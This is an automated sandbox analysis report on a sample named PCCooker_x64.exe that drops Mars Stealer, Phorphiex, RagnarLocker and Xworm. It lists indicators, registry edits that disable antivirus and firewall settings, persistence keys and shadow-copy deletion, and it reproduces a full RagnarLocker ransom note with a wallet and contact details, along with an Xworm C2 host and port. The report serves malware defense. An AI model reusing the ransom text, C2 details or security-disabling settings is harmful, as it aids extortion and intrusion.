marsstealer | d850d741582546a3d0ea2ad5d25e0766781f315cd37e6c58f7262df571cd0c40

Analysis

max time kernel
9s
max time network
30s
platform
windows7_x64
resource
win7-20240903-en
resource tags

arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
submitted
17-09-2024 02:26

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

PCCooker_x64.exe
Size

22.4MB
MD5

317c5fe16b5314d1921930e300d9ea39
SHA1

65eb02c735bbbf1faf212662539fbf88a00a271f
SHA256

d850d741582546a3d0ea2ad5d25e0766781f315cd37e6c58f7262df571cd0c40
SHA512

31751379ad7f6c55d87e9a5c1f56e6211d515b7d9ae055af962ed6f9205f5abad302c2e47dd56325abff85327ec3b7f9a6cf76ed34b8cbe1da06549c622c7031
SSDEEP

49152:yIT4lj7Rl9HFoDi+3JK5CS2bV5IRtyrp63FDysl28Wvp/pUOmrscrdXuMIgqJ95+:yI6

Score

10^/10

marsstealer phorphiex ragnarlocker xworm default bootkit defense_evasion discovery evasion execution impact loader persistence ransomware rat stealer trojan worm

Malware Config

Extracted

Family

marsstealer

Botnet

Default

Extracted

Path

C:\Users\Public\Documents\RGNR_B43B6AEC.txt

Ransom Note

Hello VGCARGO ! ***************************************************************************************************************** If you reading this message, then your network was PENETRATED and all of your files and data has been ENCRYPTED by RAGNAR_LOCKER ! ***************************************************************************************************************** *********What happens with your system ?************ Your network was penetrated, all your files and backups was locked! So from now there is NO ONE CAN HELP YOU to get your files back, EXCEPT US. You can google it, there is no CHANCES to decrypt data without our SECRET KEY. But don't worry ! Your files are NOT DAMAGED or LOST, they are just MODIFIED. You can get it BACK as soon as you PAY. We are looking only for MONEY, so there is no interest for us to steel or delete your information, it's just a BUSINESS $-) HOWEVER you can damage your DATA by yourself if you try to DECRYPT by any other software, without OUR SPECIFIC ENCRYPTION KEY !!! Also, all of your sensitive and private information were gathered and if you decide NOT to pay, we will upload it for public view ! **** ***********How to get back your files ?****** To decrypt all your files and data you have to pay for the encryption KEY : BTC wallet for payment: 1BKK8bsFfG3YxTd3N15GxaYfHopoThXoY4 Amount to pay (in Bitcoin): 25 **** ***********How much time you have to pay?********** * You should get in contact with us within 2 days after you noticed the encryption to get a better price. * The price would be increased by 100% (double price) after 14 Days if there is no contact made. * The key would be completely erased in 21 day if there is no contact made or no deal made. Some sensetive information stolen from the file servers would be uploaded in public or to re-seller. **** ***********What if files can't be restored ?****** To prove that we really can decrypt your data, we will decrypt one of your locked files ! Just send it to us and you will get it back FOR FREE. The price for the decryptor is based on the network size, number of employees, annual revenue. Please feel free to contact us for amount of BTC that should be paid. **** ! IF you don't know how to get bitcoins, we will give you advise how to exchange the money. !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! ! HERE IS THE SIMPLE MANUAL HOW TO GET CONTCAT WITH US ! !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! 1) Go to the official website of TOX messenger ( https://tox.chat/download.html ) 2) Download and install qTOX on your PC, choose the platform ( Windows, OS X, Linux, etc. ) 3) Open messenger, click "New Profile" and create profile. 4) Click "Add friends" button and search our contact 7D509C5BB14B1B8CB0A3338EEA9707AD31075868CB9515B17C4C0EC6A0CCCA750CA81606900D 5) For identification, send to our support data from ---RAGNAR SECRET--- IMPORTANT ! IF for some reasons you CAN'T CONTACT us in qTOX, here is our reserve mailbox ( [email protected] ) send a message with a data from ---RAGNAR SECRET--- WARNING! -Do not try to decrypt files with any third-party software (it will be damaged permanently) -Do not reinstall your OS, this can lead to complete data loss and files cannot be decrypted. NEVER! -Your SECRET KEY for decryption is on our server, but it will not be stored forever. DO NOT WASTE TIME ! *********************************************************************************** ---RAGNAR SECRET--- QWZjY0QxRTk2MWU4RTIwYkVCRUNhRWMzRjhCQTdlZDJkNUJCN2JkNDdDMzREMTYyNjNGNTdiZGFDYmI3ZEVhNw== ---RAGNAR SECRET--- ***********************************************************************************

Emails

[email protected]

Wallets

1BKK8bsFfG3YxTd3N15GxaYfHopoThXoY4

URLs

https://tox.chat/download.html

Extracted

Family

xworm

Version

5.0

outside-sand.gl.at.ply.gg:31300

Mutex

uGoUQjcjqoZsiRJZ

Attributes

Install_directory
%AppData%
install_file
USB.exe

aes.plain

Signatures

Detect Xworm Payload 48 IoCs

resource	yara_rule
behavioral1/files/0x000200000000f388-368.dat	family_xworm
behavioral1/files/0x000200000000f6f0-380.dat	family_xworm
behavioral1/memory/1944-384-0x00000000000A0000-0x00000000000B0000-memory.dmp	family_xworm
behavioral1/memory/1576-392-0x0000000000BB0000-0x0000000000BC0000-memory.dmp	family_xworm
behavioral1/files/0x0002000000012036-420.dat	family_xworm
behavioral1/files/0x0002000000010308-419.dat	family_xworm
behavioral1/files/0x0005000000018697-431.dat	family_xworm
behavioral1/memory/1448-426-0x00000000000C0000-0x00000000000D0000-memory.dmp	family_xworm
behavioral1/memory/2104-425-0x0000000000C80000-0x0000000000C90000-memory.dmp	family_xworm
behavioral1/files/0x0005000000018745-444.dat	family_xworm
behavioral1/memory/856-446-0x0000000000C90000-0x0000000000CA0000-memory.dmp	family_xworm
behavioral1/memory/1760-451-0x00000000012F0000-0x0000000001300000-memory.dmp	family_xworm
behavioral1/files/0x0005000000019237-460.dat	family_xworm
behavioral1/files/0x000500000001924f-459.dat	family_xworm
behavioral1/files/0x0005000000019274-478.dat	family_xworm
behavioral1/memory/1884-477-0x0000000000F90000-0x0000000000FA0000-memory.dmp	family_xworm
behavioral1/files/0x000500000001938e-490.dat	family_xworm
behavioral1/files/0x000500000001927a-471.dat	family_xworm
behavioral1/memory/2580-511-0x00000000002F0000-0x0000000000300000-memory.dmp	family_xworm
behavioral1/files/0x0005000000019426-536.dat	family_xworm
behavioral1/memory/2604-529-0x0000000000310000-0x0000000000320000-memory.dmp	family_xworm
behavioral1/files/0x000500000001939f-526.dat	family_xworm
behavioral1/memory/2680-525-0x0000000000DE0000-0x0000000000DF0000-memory.dmp	family_xworm
behavioral1/files/0x00050000000192a1-523.dat	family_xworm
behavioral1/memory/2992-520-0x00000000009B0000-0x00000000009C0000-memory.dmp	family_xworm
behavioral1/memory/1528-510-0x00000000000E0000-0x00000000000F0000-memory.dmp	family_xworm
behavioral1/memory/2044-482-0x0000000000EF0000-0x0000000000F00000-memory.dmp	family_xworm
behavioral1/memory/2844-538-0x0000000000B20000-0x0000000000B30000-memory.dmp	family_xworm
behavioral1/files/0x0005000000019535-541.dat	family_xworm
behavioral1/files/0x0005000000019543-543.dat	family_xworm
behavioral1/memory/912-631-0x00000000002F0000-0x0000000000300000-memory.dmp	family_xworm
behavioral1/files/0x0005000000019647-588.dat	family_xworm
behavioral1/memory/2424-640-0x0000000000140000-0x0000000000150000-memory.dmp	family_xworm
behavioral1/files/0x000500000001a444-642.dat	family_xworm
behavioral1/memory/1820-662-0x0000000000870000-0x0000000000880000-memory.dmp	family_xworm
behavioral1/memory/2360-639-0x0000000000F00000-0x0000000000F10000-memory.dmp	family_xworm
behavioral1/memory/1580-638-0x0000000000CC0000-0x0000000000CD0000-memory.dmp	family_xworm
behavioral1/memory/2540-657-0x00000000010D0000-0x00000000010E0000-memory.dmp	family_xworm
behavioral1/memory/2788-649-0x0000000000C20000-0x0000000000C30000-memory.dmp	family_xworm
behavioral1/memory/588-614-0x0000000000F10000-0x0000000000F20000-memory.dmp	family_xworm
behavioral1/files/0x0005000000019c79-581.dat	family_xworm
behavioral1/memory/1984-651-0x0000000000CD0000-0x0000000000CE0000-memory.dmp	family_xworm
behavioral1/files/0x000500000001a448-644.dat	family_xworm
behavioral1/files/0x000500000001a446-629.dat	family_xworm
behavioral1/memory/2644-628-0x00000000002D0000-0x00000000002E0000-memory.dmp	family_xworm
behavioral1/files/0x0005000000019cc8-620.dat	family_xworm
behavioral1/memory/1572-618-0x0000000000F60000-0x0000000000F70000-memory.dmp	family_xworm
behavioral1/files/0x0005000000019f77-602.dat	family_xworm

Mars Stealer
An infostealer written in C++ based on other infostealers.
stealer marsstealer

Modifies security service 2 TTPs 1 IoCs

evasion

Modify Registry

T1112

Windows Service

T1543.003

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\wuauserv\Start = "4"	sysmablsvr.exe

Phorphiex payload 2 IoCs

resource	yara_rule
behavioral1/files/0x000300000000586a-636.dat	family_phorphiex
behavioral1/files/0x000400000001d3a6-5824.dat	family_phorphiex

Phorphiex, Phorpiex
Phorphiex or Phorpiex Malware family which infects systems to distribute other malicious payloads such as ransomware, stealers and cryptominers.
worm trojan loader phorphiex
RagnarLocker
Ransomware first seen at the end of 2019, which has been used in targetted attacks against multiple companies.
ransomware ragnarlocker

Windows security bypass 2 TTPs 6 IoCs

evasion trojan

Disable or Modify Tools

T1562.001

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\FirewallOverride = "1"	sysmablsvr.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\FirewallDisableNotify = "1"	sysmablsvr.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\AntiVirusOverride = "1"	sysmablsvr.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\AntiVirusDisableNotify = "1"	sysmablsvr.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\UpdatesOverride = "1"	sysmablsvr.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\UpdatesDisableNotify = "1"	sysmablsvr.exe

Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm
Deletes shadow copies 3 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware defense_evasion impact execution

File Deletion
T1070.004

Inhibit System Recovery
T1490

Windows Management Instrumentation
T1047
Renames multiple (2487) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
ransomware

Command and Scripting Interpreter: PowerShell 1 TTPs 64 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
1228	powershell.exe
5452	powershell.exe
6436	powershell.exe
4980	powershell.exe
4300	powershell.exe
1472	powershell.exe
5908	powershell.exe
3080	powershell.exe
7468	powershell.exe
7148	powershell.exe
5012	powershell.exe
3640	powershell.exe
4104	powershell.exe
4372	powershell.exe
5408	powershell.exe
7036	powershell.exe
3508	powershell.exe
4240	powershell.exe
616	powershell.exe
7516	powershell.exe
396	powershell.exe
7504	powershell.exe
5116	powershell.exe
5840	powershell.exe
6176	powershell.exe
3724	powershell.exe
3736	powershell.exe
5336	powershell.exe
3316	powershell.exe
1772	powershell.exe
5676	powershell.exe
4992	powershell.exe
4316	powershell.exe
3076	powershell.exe
5252	powershell.exe
5844	powershell.exe
3356	powershell.exe
5800	powershell.exe
5900	powershell.exe
5332	powershell.exe
8000	powershell.exe
3612	powershell.exe
4424	powershell.exe
896	powershell.exe
4780	powershell.exe
4968	powershell.exe
4128	powershell.exe
4412	powershell.exe
4776	powershell.exe
6928	powershell.exe
3176	powershell.exe
5748	powershell.exe
5976	powershell.exe
4764	powershell.exe
5424	powershell.exe
5640	powershell.exe
6024	powershell.exe
5428	powershell.exe
3680	powershell.exe
4368	powershell.exe
1876	powershell.exe
5476	powershell.exe
4752	powershell.exe
3708	powershell.exe

Downloads MZ/PE file
Stops running service(s) 4 TTPs
evasion execution

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

Service Execution
T1569.002

Drops startup file 1 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8b7a4d25.exe	explorer.exe

Executes dropped EXE 34 IoCs

pid	Process
2816	4363463463464363463463463.exe
2692	a76e49df84ba2a7b33e8ea959995b5e6faecb90d551ef169d8272ce9042c35a5.exe
2708	asena.exe
2592	CryptoWall.exe
3032	Bomb.exe
776	npp.exe
1944	25.exe
1576	24.exe
1448	23.exe
2104	22.exe
856	21.exe
1760	20.exe
2044	19.exe
1884	18.exe
1528	16.exe
2992	17.exe
2680	15.exe
2580	14.exe
2604	13.exe
2844	12.exe
2644	11.exe
588	10.exe
1572	8.exe
2360	9.exe
912	6.exe
2424	7.exe
1580	4.exe
1984	5.exe
2788	3.exe
2408	o.exe
1820	1.exe
2540	2.exe
2444	sysmablsvr.exe
3684	305268027.exe

Loads dropped DLL 12 IoCs

pid	Process
1204	PCCooker_x64.exe
1204	PCCooker_x64.exe
1204	PCCooker_x64.exe
1204	PCCooker_x64.exe
1204	PCCooker_x64.exe
1204	PCCooker_x64.exe
1204	PCCooker_x64.exe
2816	4363463463464363463463463.exe
2816	4363463463464363463463463.exe
2816	4363463463464363463463463.exe
776	npp.exe
776	npp.exe

Windows security modification 2 TTPs 7 IoCs

evasion trojan

Disable or Modify Tools

T1562.001

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\AntiVirusOverride = "1"	sysmablsvr.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\AntiVirusDisableNotify = "1"	sysmablsvr.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\UpdatesOverride = "1"	sysmablsvr.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\UpdatesDisableNotify = "1"	sysmablsvr.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\FirewallOverride = "1"	sysmablsvr.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\FirewallDisableNotify = "1"	sysmablsvr.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\AntiSpywareOverride = "1"	sysmablsvr.exe

Adds Run key to start application 2 TTPs 5 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce\*b7a4d2 = "C:\\8b7a4d25\\8b7a4d25.exe"	explorer.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Windows\CurrentVersion\Run\8b7a4d25 = "C:\\Users\\Admin\\AppData\\Roaming\\8b7a4d25.exe"	explorer.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce\*b7a4d25 = "C:\\Users\\Admin\\AppData\\Roaming\\8b7a4d25.exe"	explorer.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\Windows Settings = "C:\\Windows\\sysmablsvr.exe"	o.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Windows\CurrentVersion\Run\8b7a4d2 = "C:\\8b7a4d25\\8b7a4d25.exe"	explorer.exe

Enumerates connected drives 3 TTPs 1 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
File opened (read-only)	\??\E:	asena.exe

Looks up external IP address via web service 3 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
9	ip-addr.es
11	myexternalip.com
22	ip-api.com

Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs

Bootkits write to the MBR to gain persistence at a level below the operating system.

bootkit persistence

Bootkit

T1542.003

description	ioc	Process
File opened for modification	\??\PHYSICALDRIVE0	asena.exe

Drops file in Program Files directory 64 IoCs

description	ioc	Process
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.launcher.win32.win32.x86_64.nl_zh_4.4.0.v20140623020002.jar	asena.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-applemenu_ja.jar	asena.exe
File opened for modification	C:\Program Files\Common Files\Microsoft Shared\Stationery\Pretty_Peacock.jpg	asena.exe
File opened for modification	C:\Program Files\DVD Maker\Shared\DvdStyles\rectangle_photo_Thumbnail.bmp	asena.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.historicaldata_5.5.0.165303.jar	asena.exe
File created	C:\Program Files\VideoLAN\VLC\locale\bg\RGNR_B43B6AEC.txt	asena.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\lib\charsets.jar	asena.exe
File opened for modification	C:\Program Files\Microsoft Games\SpiderSolitaire\fr-FR\SpiderSolitaire.exe.mui	asena.exe
File created	C:\Program Files\VideoLAN\VLC\locale\ne\RGNR_B43B6AEC.txt	asena.exe
File opened for modification	C:\Program Files\Java\jre7\lib\zi\America\Ojinaga	asena.exe
File opened for modification	C:\Program Files\Java\jre7\lib\zi\Indian\Mahe	asena.exe
File created	C:\Program Files\Common Files\SpeechEngines\Microsoft\TTS20\de-DE\RGNR_B43B6AEC.txt	asena.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\Auckland	asena.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\p2\org.eclipse.equinox.p2.engine\profileRegistry\JMC.profile\1423861261279.profile.gz	asena.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-openide-execution_ja.jar	asena.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\update_tracking\com-sun-tools-visualvm-modules-appui.xml	asena.exe
File opened for modification	C:\Program Files\Common Files\Microsoft Shared\ink\sl-SI\tipresx.dll.mui	asena.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Puerto_Rico	asena.exe
File opened for modification	C:\Program Files\Java\jre7\lib\zi\America\Cancun	asena.exe
File created	C:\Program Files\Common Files\Microsoft Shared\ink\hr-HR\RGNR_B43B6AEC.txt	asena.exe
File opened for modification	C:\Program Files\Microsoft Games\SpiderSolitaire\it-IT\SpiderSolitaire.exe.mui	asena.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.browser_5.5.0.165303.jar	asena.exe
File opened for modification	C:\Program Files\Java\jre7\lib\zi\America\Vancouver	asena.exe
File opened for modification	C:\Program Files\Java\jre7\lib\content-types.properties	asena.exe
File created	C:\Program Files\Common Files\Microsoft Shared\ink\ru-RU\RGNR_B43B6AEC.txt	asena.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\css\e4_classic_winxp.css	asena.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-modules-core-kit.xml	asena.exe
File opened for modification	C:\Program Files\DVD Maker\Shared\DvdStyles\photoedge_selectionsubpicture.png	asena.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.launcher.win32.win32.x86_64_1.1.200.v20141007-2033\launcher.win32.win32.x86_64.properties	asena.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-host-views_ja.jar	asena.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-threaddump_ja.jar	asena.exe
File opened for modification	C:\Program Files\Java\jre7\lib\zi\America\Montevideo	asena.exe
File opened for modification	C:\Program Files\DVD Maker\ja-JP\DVDMaker.exe.mui	asena.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\lib\net.properties	asena.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\RGNR_B43B6AEC.txt	asena.exe
File opened for modification	C:\Program Files\Common Files\SpeechEngines\Microsoft\TTS20\es-ES\MSTTSLoc.dll.mui	asena.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.model.workbench.nl_zh_4.4.0.v20140623020002.jar	asena.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\config\Modules\com-sun-tools-visualvm-jvm.xml	asena.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-openide-options_zh_CN.jar	asena.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-openide-loaders.xml	asena.exe
File opened for modification	C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\main\ja-jp.xml	asena.exe
File opened for modification	C:\Program Files\Common Files\Microsoft Shared\ink\pt-BR\tipresx.dll.mui	asena.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.app_1.3.200.v20130910-1609.jar	asena.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-openide-io.xml	asena.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\core\org-openide-filesystems.jar	asena.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.mbeanbrowser.zh_CN_5.5.0.165303.jar	asena.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.bindings_0.10.200.v20140424-2042.jar	asena.exe
File opened for modification	C:\Program Files\Common Files\Microsoft Shared\ink\de-DE\IPSEventLogMsg.dll.mui	asena.exe
File opened for modification	C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\keypad\kor-kor.xml	asena.exe
File opened for modification	C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\web.xml	asena.exe
File opened for modification	C:\Program Files\Common Files\Microsoft Shared\Stationery\Stars.jpg	asena.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\include\win32\bridge\AccessBridgePackages.h	asena.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\winXPHandle.png	asena.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\RGNR_B43B6AEC.txt	asena.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-api-visual.xml	asena.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\locale\org-netbeans-modules-profiler-selector-ui_zh_CN.jar	asena.exe
File opened for modification	C:\Program Files\Java\jre7\lib\images\cursors\cursors.properties	asena.exe
File opened for modification	C:\Program Files\Java\jre7\lib\zi\America\North_Dakota\New_Salem	asena.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\ModuleAutoDeps\org-openide-filesystems.xml	asena.exe
File opened for modification	C:\Program Files\Java\jre7\lib\zi\America\Martinique	asena.exe
File created	C:\Program Files\Microsoft Games\FreeCell\ja-JP\RGNR_B43B6AEC.txt	asena.exe
File opened for modification	C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\Workflow.VisualBasic.Targets	asena.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\SystemV\YST9	asena.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.osgi.nl_zh_4.4.0.v20140623020002.jar	asena.exe

Drops file in Windows directory 2 IoCs

description	ioc	Process
File created	C:\Windows\sysmablsvr.exe	o.exe
File opened for modification	C:\Windows\sysmablsvr.exe	o.exe

Launches sc.exe 5 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
6608	sc.exe
6692	sc.exe
2184	sc.exe
6872	sc.exe
5296	sc.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 9 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	npp.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	4363463463464363463463463.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	asena.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	CryptoWall.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	o.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	PCCooker_x64.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	vssadmin.exe

Interacts with shadow copies 3 TTPs 2 IoCs

Shadow copies are often targeted by ransomware to inhibit system recovery.

ransomware

File Deletion

T1070.004

Inhibit System Recovery

T1490

Direct Volume Access

T1006

pid	Process
3024	vssadmin.exe
1572	vssadmin.exe

Opens file in notepad (likely ransom note) 1 IoCs

ransomware

pid	Process
7488	notepad.exe

Suspicious behavior: MapViewOfSection 2 IoCs

pid	Process
2592	CryptoWall.exe
2292	explorer.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeIncreaseQuotaPrivilege	2620	wmic.exe
Token: SeSecurityPrivilege	2620	wmic.exe
Token: SeTakeOwnershipPrivilege	2620	wmic.exe
Token: SeLoadDriverPrivilege	2620	wmic.exe
Token: SeSystemProfilePrivilege	2620	wmic.exe
Token: SeSystemtimePrivilege	2620	wmic.exe
Token: SeProfSingleProcessPrivilege	2620	wmic.exe
Token: SeIncBasePriorityPrivilege	2620	wmic.exe
Token: SeCreatePagefilePrivilege	2620	wmic.exe
Token: SeBackupPrivilege	2620	wmic.exe
Token: SeRestorePrivilege	2620	wmic.exe
Token: SeShutdownPrivilege	2620	wmic.exe
Token: SeDebugPrivilege	2620	wmic.exe
Token: SeSystemEnvironmentPrivilege	2620	wmic.exe
Token: SeRemoteShutdownPrivilege	2620	wmic.exe
Token: SeUndockPrivilege	2620	wmic.exe
Token: SeManageVolumePrivilege	2620	wmic.exe
Token: 33	2620	wmic.exe
Token: 34	2620	wmic.exe
Token: 35	2620	wmic.exe
Token: SeIncreaseQuotaPrivilege	2620	wmic.exe
Token: SeSecurityPrivilege	2620	wmic.exe
Token: SeTakeOwnershipPrivilege	2620	wmic.exe
Token: SeLoadDriverPrivilege	2620	wmic.exe
Token: SeSystemProfilePrivilege	2620	wmic.exe
Token: SeSystemtimePrivilege	2620	wmic.exe
Token: SeProfSingleProcessPrivilege	2620	wmic.exe
Token: SeIncBasePriorityPrivilege	2620	wmic.exe
Token: SeCreatePagefilePrivilege	2620	wmic.exe
Token: SeBackupPrivilege	2620	wmic.exe
Token: SeRestorePrivilege	2620	wmic.exe
Token: SeShutdownPrivilege	2620	wmic.exe
Token: SeDebugPrivilege	2620	wmic.exe
Token: SeSystemEnvironmentPrivilege	2620	wmic.exe
Token: SeRemoteShutdownPrivilege	2620	wmic.exe
Token: SeUndockPrivilege	2620	wmic.exe
Token: SeManageVolumePrivilege	2620	wmic.exe
Token: 33	2620	wmic.exe
Token: 34	2620	wmic.exe
Token: 35	2620	wmic.exe
Token: SeBackupPrivilege	1632	vssvc.exe
Token: SeRestorePrivilege	1632	vssvc.exe
Token: SeAuditPrivilege	1632	vssvc.exe
Token: SeDebugPrivilege	2816	4363463463464363463463463.exe
Token: SeDebugPrivilege	1576	24.exe
Token: SeDebugPrivilege	1944	25.exe
Token: SeDebugPrivilege	2104	22.exe
Token: SeDebugPrivilege	1448	23.exe
Token: SeDebugPrivilege	856	21.exe
Token: SeDebugPrivilege	1760	20.exe
Token: SeDebugPrivilege	1884	18.exe
Token: SeDebugPrivilege	2044	19.exe
Token: SeDebugPrivilege	2992	17.exe
Token: SeDebugPrivilege	1528	16.exe
Token: SeDebugPrivilege	2680	15.exe
Token: SeDebugPrivilege	2580	14.exe
Token: SeDebugPrivilege	2604	13.exe
Token: SeDebugPrivilege	2844	12.exe
Token: SeDebugPrivilege	2644	11.exe
Token: SeDebugPrivilege	2360	9.exe
Token: SeDebugPrivilege	588	10.exe
Token: SeDebugPrivilege	1572	8.exe
Token: SeDebugPrivilege	2424	7.exe
Token: SeDebugPrivilege	912	6.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1204 wrote to memory of 2816	1204	PCCooker_x64.exe	30
PID 1204 wrote to memory of 2816	1204	PCCooker_x64.exe	30
PID 1204 wrote to memory of 2816	1204	PCCooker_x64.exe	30
PID 1204 wrote to memory of 2816	1204	PCCooker_x64.exe	30
PID 1204 wrote to memory of 2692	1204	PCCooker_x64.exe	32
PID 1204 wrote to memory of 2692	1204	PCCooker_x64.exe	32
